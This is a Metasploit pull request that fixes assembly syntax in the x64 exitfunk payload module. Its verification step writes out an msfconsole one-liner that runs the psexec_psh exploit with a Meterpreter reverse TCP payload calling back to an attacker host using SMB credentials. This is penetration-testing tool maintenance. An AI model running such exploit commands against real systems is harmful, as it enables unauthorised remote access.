### PR TITLE
Fix exitfunk module for x64

### DIFF
--- a/lib/msf/core/payload/windows/x64/exitfunk.rb
+++ b/lib/msf/core/payload/windows/x64/exitfunk.rb
@@ -40,14 +40,14 @@ module Payload::Windows::Exitfunk_x64
         mov r10d, 0x9DBD95A6  ; hash( "kernel32.dll", "GetVersion" )
         call rbp              ; GetVersion(); (AL will = major version and AH will = minor version)
         add rsp, 40           ; cleanup the default param space on stack
-        cmp al, byte 6        ; If we are not running on Windows Vista, 2008 or 7
-        jl short goodbye      ; Then just call the exit function...
+        cmp al, 6             ; If we are not running on Windows Vista, 2008 or 7
+        jl exitfunk_goodbye   ; Then just call the exit function...
         cmp bl, 0xE0          ; If we are trying a call to kernel32.dll!ExitThread on
                               ; Windows Vista, 2008 or 7...
-        jne short goodbye     ;
+        jne exitfunk_goodbye  ;
         mov ebx, 0x6F721347   ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
-      goodbye:                ; We now perform the actual call to the exit function
-        push byte 0           ;
+      exitfunk_goodbye:       ; We now perform the actual call to the exit function
+        push 0                ;
         pop rcx               ; set the exit function parameter
         mov r10d, ebx         ; place the correct EXITFUNK into r10d
         call rbp              ; call EXITFUNK( 0 );


### PR DESCRIPTION
The exitfunk module was using asm keywords that are considered invalid by metasm. This commit removes these keywords and also adjusts one of the label names to reduce the chance of a collision with other files.

This fixes #5335.
## Verification

Run a `psexec_psh` exploit against a vulnerable target with appropriate creds:

```
./msfconsole -x 'use exploit/windows/smb/psexec_psh; set payload windows/x64/meterpreter/reverse_tcp; set RHOST <target ip>; set LHOST <attacker ip>; set SMBUser <name>; set SMBPass <pass>; set SMBDomain <domain>; run'
```
- [x] Execution doesn't result in an error that states: `[-] Exploit failed: invalid modrm near "byte" at "\"<unk>\"" line 188`
